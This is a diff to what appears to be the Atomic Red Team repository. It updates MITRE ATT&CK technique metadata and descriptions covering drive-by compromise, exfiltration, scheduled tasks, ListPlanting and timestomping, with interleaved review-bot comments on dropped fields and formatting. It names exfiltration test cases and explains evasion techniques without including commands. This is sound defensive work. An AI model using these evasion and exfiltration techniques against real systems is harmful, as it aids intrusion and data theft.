@@ -98009,11 +98909,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -98074,8 +98973,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
@@ -98103,13 +99002,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -98149,8 +99047,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -98158,13 +99058,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -98195,14 +99095,11 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
@@ -98269,11 +99166,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -98325,9 +99221,8 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges
@@ -98411,7 +99306,7 @@ initial-access:
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -98435,10 +99330,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
@@ -98457,13 +99351,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -98502,9 +99395,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -98554,7 +99446,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -98574,7 +99465,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -98594,8 +99485,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1011:
technique:
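Review bot: for T1029 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are deleted and nothing is added, so the object ends up with no attack spec version at all. Elsewhere in this diff the field is either bumped to `3.2.0` or left at `2.1.0` (T1195.002), so an object missing the field is an outlier; confirm the upstream object genuinely lacks it rather than the generator dropping it alongside `spec_version`. The same pattern recurs for T1011.001, T1048.001, T1048.002, T1052.001, T1030 and T1052 further down.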
@@ -98642,7 +99531,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1011.001:
technique:
@@ -98662,7 +99550,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -98684,8 +99572,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -98739,7 +99625,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests:
- name: IcedID Botnet HTTP PUT
@@ -98825,7 +99710,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -98860,12 +99745,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -98890,11 +99773,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
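Review bot: `x_mitre_network_requirements: false` is removed from T1020.001 while `x_mitre_version` moves from `1.2` to `1.3`; the same field is also removed from T1048 later in the diff. A field disappearing together with a version bump is consistent with an upstream schema change, but a generator with an allow-list of `x_mitre_*` keys would produce the identical diff, so verify which it is before merging, because a dropped field is not recoverable from this file.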
@@ -98937,9 +99819,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -98986,7 +99867,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -99012,7 +99892,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -99045,8 +99925,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests:
- name: Exfiltrate data HTTPS using curl windows
@@ -99093,7 +99971,7 @@ exfiltration:
'
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
@@ -99142,7 +100020,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests:
- name: C2 Data Exfiltration
@@ -99206,7 +100083,7 @@ exfiltration:
name: powershell
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -99242,12 +100119,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
@@ -99256,7 +100132,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -99280,9 +100155,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests:
- name: DNSExfiltration (doh)
@@ -99357,7 +100231,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -99379,8 +100253,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -99431,7 +100303,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests:
- name: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)
@@ -99507,7 +100378,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests:
- name: Exfiltrate data with rclone to cloud Storage - Mega (Windows)
@@ -99594,7 +100464,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -99617,8 +100487,6 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests:
- name: Network-Based Data Transfer in Small Chunks
@@ -99655,7 +100523,7 @@ exfiltration:
$file.Close()
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -99696,9 +100564,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
@@ -99746,7 +100613,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -99768,7 +100634,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -99792,12 +100658,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -99861,7 +100725,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests:
- name: Exfiltration Over Alternative Protocol - ICMP
diff --git a/atomics/T1027.004/T1027.004.md b/atomics/T1027.004/T1027.004.md
index ea1367cde0..ba41078dc3 100644
--- a/atomics/T1027.004/T1027.004.md
+++ b/atomics/T1027.004/T1027.004.md
@@ -1,6 +1,6 @@
# T1027.004 - Obfuscated Files or Information: Compile After Delivery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/004)
-Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
diff --git a/atomics/T1053.002/T1053.002.md b/atomics/T1053.002/T1053.002.md
index 99a659aad4..773384916f 100644
--- a/atomics/T1053.002/T1053.002.md
+++ b/atomics/T1053.002/T1053.002.md
@@ -1,6 +1,6 @@
# T1053.002 - Scheduled Task/Job: At
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/002)
-Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
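Review bot: the new `Win32_ScheduledJob` sentence uses backticks for inline code, but the unchanged context below it still carries the older generator artefact where inline code was turned into a line break (`at.allow` / `file`, `at.deny` / `file`, `at.deny` / `is allowed`), which splits one sentence into several fragments in rendered markdown; if the description generator is being touched anyway, inline `<code>` spans should be converted to backticks, as the added text already does, rather than to newlines.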
diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md
index 5e1bcd269b..70631a020e 100644
--- a/atomics/T1053.005/T1053.005.md
+++ b/atomics/T1053.005/T1053.005.md
@@ -1,8 +1,6 @@
# T1053.005 - Scheduled Task/Job: Scheduled Task
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/005)
-Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
-
-The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though at.exe
can not access tasks created with schtasks
or the Control Panel.
+Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)
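Review bot: the three removed lines about the deprecated `at` utility and the `at.exe` / `schtasks` incompatibility are not carried into the replacement paragraph, so the cross-reference to [At](https://attack.mitre.org/techniques/T1053/002) disappears from this page; if the upstream description really dropped it this is fine, but it is worth confirming it is not a lost merge, since the rest of the hunk only adds the WMI, `Invoke-CimMethod` and `PS_ScheduledTask` material and the `(Citation: Stack Overflow)` marker.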
diff --git a/atomics/T1055.015/T1055.015.md b/atomics/T1055.015/T1055.015.md
index 8ab54d42c8..1f9f14c82f 100644
--- a/atomics/T1055.015/T1055.015.md
+++ b/atomics/T1055.015/T1055.015.md
@@ -1,6 +1,6 @@
# T1055.015 - Process Injection: ListPlanting
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/015)
-Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
+Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process.(Citation: Hexacorn Listplanting) Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a SysListView32
control.
diff --git a/atomics/T1070.006/T1070.006.md b/atomics/T1070.006/T1070.006.md
index 500844b3d3..bd98f45157 100644
--- a/atomics/T1070.006/T1070.006.md
+++ b/atomics/T1070.006/T1070.006.md
@@ -1,6 +1,12 @@
# T1070.006 - Indicator Removal on Host: Timestomp
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/006)
-Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
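Review bot: the added paragraph introduces typographic quotes around “double timestomping” where the rest of this file uses plain ASCII; normalise to straight quotes so the file stays greppable and later regenerations do not churn on character encoding. The substantive split the hunk adds, `$SI` modifiable through user-level API calls versus `$FN` requiring kernel interaction or a move/rename, is the right detection hint and should stay as written.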
diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md
index 81bb741f40..37339a8be0 100644
--- a/atomics/T1071/T1071.md
+++ b/atomics/T1071/T1071.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1071)
Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
-Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
+Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
## Atomic Tests
diff --git a/atomics/T1072/T1072.md b/atomics/T1072/T1072.md
index acdeb6511c..a3888fa299 100644
--- a/atomics/T1072/T1072.md
+++ b/atomics/T1072/T1072.md
@@ -4,7 +4,7 @@
Access to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
-SaaS-based configuration management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan)
+SaaS-based configuration management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan)
Network infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 115b35bfae..574c0a6440 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1087/002)
